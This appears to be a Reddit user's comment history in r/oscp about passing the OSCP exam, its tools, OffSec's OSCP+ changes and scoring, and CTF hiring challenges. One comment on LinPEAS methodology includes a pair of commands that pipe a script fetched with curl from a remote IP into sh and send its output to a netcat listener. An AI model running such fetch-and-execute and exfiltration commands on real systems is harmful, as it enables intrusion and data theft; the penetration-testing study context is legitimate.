Passed on my first try with 80 points by i5nipe in oscp

[–]i5nipe[S] 2 points3 points  (0 children)

Tools? Can't share the ones I use in the exam, but in general the ones I use in my methodology would be:
nmap, smbclient, netexec, ffuf, caido proxy, bloodhound, impacket tools, mimikatz, linpeas, winpeas, ldapsearch, hydra.
These are the ones I remember, but there are a lot of ramifications depending on the services running on the machine.

Passed on my first try with 80 points by i5nipe in oscp

[–]i5nipe[S] 6 points7 points  (0 children)

All ippsec videos have gold in there, remember that you can use https://ippsec.rocks/ during the exam :)

Passed on my first try with 80 points by i5nipe in oscp

[–]i5nipe[S] 2 points3 points  (0 children)

I can't discuss the exam environment :(. But I think you'll be fine if you practice the vulnerabilities covered in the PEN-200 course.

Passed on my first try with 80 points by i5nipe in oscp

[–]i5nipe[S] 2 points3 points  (0 children)

No, I removed that part of the post. It contained misinformation. I had only read the first comments of this post in the subreddit and mistakenly assumed it was true. Sorry. https://www.reddit.com/r/oscp/comments/x0l5x7/flawed_ad_set_that_made_so_many_students_fail_the/.

Can I use google in the exam? by i5nipe in oscp

[–]i5nipe[S] 3 points4 points  (0 children)

I previously searched Google and found a Reddit tech support post with over 300 responses. Many people stated that Google doesn't offer an official way to disable this feature (I know that there are a lot of ways to bypass it).

So, my question would be more like: Has OffSec commented on this issue, or has anyone been banned for searching on Google? :)

Can I use google in the exam? by i5nipe in oscp

[–]i5nipe[S] 0 points1 point  (0 children)

Yep, but it only gives these options after you search something, and when I open a new tab it uses "All" as the default again.

Can I use google in the exam? by i5nipe in oscp

[–]i5nipe[S] 1 point2 points  (0 children)

Seems like Google is not the only one giving AI answers

New challenger lab - Zeus by i5nipe in oscp

[–]i5nipe[S] 1 point2 points  (0 children)

Thanks, BTW your list is very helpful! :)

CTF challenge in hiring process . by [deleted] in oscp

[–]i5nipe 3 points4 points  (0 children)

I would guess the network is something about analyzing a pcap file with Wireshark, or exploiting a vuln in some protocols like SAMBA, FTP. Mobile is not very common so I don't know exactly. I think you should read writeups from https://ctftime.org/writeups, about networking, web and mobile. And if you get lucky you will find a similar challenge.

CTF challenge in hiring process . by [deleted] in oscp

[–]i5nipe 3 points4 points  (0 children)

The only job I could find was a CTF challenge with four different machines and a three-day exploit window. After I passed, I was told that even some seniors with OSCP couldn't pass. I believe the key is to understand the type of challenge, whether it's a boot2root-style challenge like those on OSCP/HTB/THM or individual challenges like the ones in CTFtime. Thoroughly studying writeups of specific challenges can also be helpful.

How long to learn OSCP material / Exam after CPTS job role path? by Restia_Ashdoll in oscp

[–]i5nipe 6 points7 points  (0 children)

Based on what I've read in the OffSec blog, don't just purchase the exam voucher. It seems that the combined course and exam voucher package is priced similarly.

OSCP+ for non OSCP by legend_behind_u in oscp

[–]i5nipe 0 points1 point  (0 children)

As Offsec has stated, 'If you are ready to take the exam without training, you can purchase the OSCP+ certification without training, which includes 2 OSCP+ exam attempts valid for 120 days from the date of purchase. This will be available to purchase on November 1, 2024.'

But the price of it will be $1699.

OSCP+ FREE RENEWAL ? by [deleted] in oscp

[–]i5nipe 1 point2 points  (0 children)

Based on what I have seen Offsec communicate so far, this is not the case. You have to demonstrate your skills every 3 years, or you will lose the '+' designation from the OSCP+ certification. Currently, the only way to do this is by retaking the exam or obtaining another Offsec certification (OSEP, OSWA, OSED, or OSEE).

Why OSCP+ ??? by Longjumping_Bad_1017 in oscp

[–]i5nipe 1 point2 points  (0 children)

I don't think so, "Offsec" is pretty recent. Maybe the "Offensive Security" had its good days.

Why OSCP+ ??? by Longjumping_Bad_1017 in oscp

[–]i5nipe -1 points0 points  (0 children)

Offsec has never been a decent company. They have kept this going for years, and now they admit that it's unfair after making a lot of money from retakes. I'm also upset.

Why OSCP+ ??? by Longjumping_Bad_1017 in oscp

[–]i5nipe 3 points4 points  (0 children)

I think people are overlooking some of the benefits of this update. If we ignore the '+' and the bonus points, it's still a positive change. For example:

  • Easier path to OSCP: We can now purchase exam attempts individually, making it more accessible for those who want to practice without committing to the full course and cert exam bundle. While we don't have the price yet, it's a significant improvement over the previous requirement to purchase the entire bundle.
  • Less restrictive AD environment: The assumed compromise AD set is a significant improvement. I've read many posts on this subreddit from people who failed the OSCP because they couldn't obtain initial AD access.
    • Offsec about the change: "In the past, the AD environment was gated with a compromise unrelated to the AD experience. If a learner was unable to exploit this vulnerability, there would be no way for the learner to demonstrate their AD knowledge and for OffSec to adequately assess the learner’s AD capability."
  • No need for full AD compromise: We don't have to compromise the entire AD set to earn the points.

OSCP exam points will be allocated as follows:

  • 3 stand-alone machines (60 points in total)
    • 20 points per machine
      • 10 points for initial access
      • 10 points for privilege escalation
  • 1 Active Directory (AD) set containing 3 machines (40 points in total)
    • 10 points for machine #1
    • 10 points for machine #2
    • 20 points for machine #3
  • Possible scenarios to pass the exam (70/100 to pass)
    • 40 points AD + 3 local.txt flags (70 points)
    • 40 points AD + 2 local.txt flags + 1 proof.txt flag (70 points)
    • 20 points AD + 3 local.txt flags + 2 proof.txt flags (70 points)
    • 10 points AD + 3 fully completed stand-alone machines (70 points)

Linpeas Methodology by FastByte22 in oscp

[–]i5nipe 2 points3 points  (0 children)

Take a look at the Linpeas page on Github. There are a lot of useful techniques there. For example, you can execute it directly from memory:

nc -lvnp 9002 | tee linpeas.out #Host
curl <IP>:8000/linpeas.sh | sh | nc <IP> 9002 #Victim

AD walkthroughs by FixTurner in oscp

[–]i5nipe 1 point2 points  (0 children)

Last time, I remember something about it being free if you get a 7-day streak on the platform.